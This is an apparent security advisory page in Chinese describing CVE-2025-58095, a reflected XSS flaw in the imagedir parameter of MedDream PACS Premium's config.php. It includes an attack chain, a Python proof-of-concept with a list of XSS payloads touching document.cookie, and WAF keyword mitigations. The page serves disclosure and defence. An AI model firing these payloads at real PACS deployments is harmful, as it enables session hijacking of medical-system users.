IPBUF安全漏洞报告
English
CVE-2025-58095 CVSS 6.1 中危

CVE-2025-58095 MedDream PACS Premium config.php 反射型XSS漏洞

披露日期: 2026-01-20
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-58095
漏洞类型
反射型跨站脚本(XSS)
CVSS评分
6.1 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
MedDream PACS Premium

相关标签

反射型XSS跨站脚本MedDream PACS Premiumconfig.phpCVE-2025-58095TALOS-2025-2271Cisco Talos

漏洞概述

CVE-2025-58095是MedDream PACS Premium 7.3.6.870版本中存在的一处高危安全漏洞。该漏洞属于反射型跨站脚本攻击(XSS),存在于config.php功能模块中。攻击者可以通过精心构造恶意URL,当受害者访问该URL时,嵌入在URL中的恶意JavaScript代码将在受害者浏览器中执行,从而实现会话劫持、敏感信息窃取、钓鱼攻击等恶意操作。由于该漏洞影响imagedir参数,攻击者可以利用此参数注入任意JavaScript代码。CVSS 3.1评分6.1,属于中等严重程度。攻击复杂度低,无需认证,但需要用户交互才能触发,这限制了漏洞的自动利用可能性。建议相关用户尽快升级到安全版本或采取临时缓解措施。

技术细节

该漏洞为反射型XSS漏洞,存在于MedDream PACS Premium的config.php文件中。漏洞的根本原因在于程序对用户输入的imagedir参数缺乏充分的输入验证和输出编码。当攻击者构造包含恶意JavaScript代码的URL并诱导用户访问时,服务器将未经处理的用户输入直接反射回响应页面,浏览器将其作为可执行脚本解析执行。攻击者可以利用此漏洞窃取用户的会话Cookie、劫持用户会话、进行钓鱼攻击或植入恶意软件。由于imagedir参数直接参与URL构造,攻击者可以通过修改该参数值为<script>alert('XSS')</script>等payload来实现代码执行。建议在服务器端对所有用户输入进行严格的输入验证,并在输出时进行适当的HTML实体编码。

攻击链分析

STEP 1
步骤1
攻击者侦察目标系统,确认目标运行MedDream PACS Premium并识别版本号
STEP 2
步骤2
攻击者构造包含XSS payload的恶意URL,将payload注入到config.php的imagedir参数中
STEP 3
步骤3
攻击者通过钓鱼邮件、社交工程或恶意网页诱导目标用户点击恶意链接
STEP 4
步骤4
目标用户浏览器发送请求到config.php,服务器将未经处理的payload反射回响应页面
STEP 5
步骤5
目标用户浏览器解析响应时执行嵌入的JavaScript代码,导致会话Cookie被窃取或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2025-58095 PoC - Reflected XSS in MedDream PACS Premium # Target: MedDream PACS Premium 7.3.6.870 # Vulnerability: Reflected XSS in config.php imagedir parameter def exploit_xss(target_url, payload): """ Exploit reflected XSS vulnerability in config.php Args: target_url: Base URL of MedDream PACS Premium payload: XSS payload to inject Returns: Response from the server """ # Construct malicious URL with XSS payload in imagedir parameter malicious_url = f"{target_url}/config.php?imagedir={payload}" print(f"[*] Sending malicious request to: {malicious_url}") try: response = requests.get(malicious_url, timeout=10) if payload in response.text: print("[+] XSS payload reflected in response - Vulnerability confirmed!") return True else: print("[-] XSS payload not reflected - Vulnerability may be patched or not present") return False except requests.RequestException as e: print(f"[-] Request failed: {e}") return False # Example payloads for testing test_payloads = [ "<script>alert(document.domain)</script>", "<img src=x onerror=alert(document.cookie)>", "<svg/onload=alert(document.cookie)>", "\"><script>alert('XSS')</script>" ] if __name__ == "__main__": target = "http://target-host/meddream" for payload in test_payloads: exploit_xss(target, payload)

影响范围

MedDream PACS Premium 7.3.6.870

防御指南

临时缓解措施
临时缓解措施:在Web应用防火墙(WAF)中配置规则,拦截包含XSS特征的请求模式,如<script>、<img、onerror等关键词。长期解决方案:升级MedDream PACS Premium到官方发布的安全版本,同时对所有用户输入点实施输入验证和输出编码。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表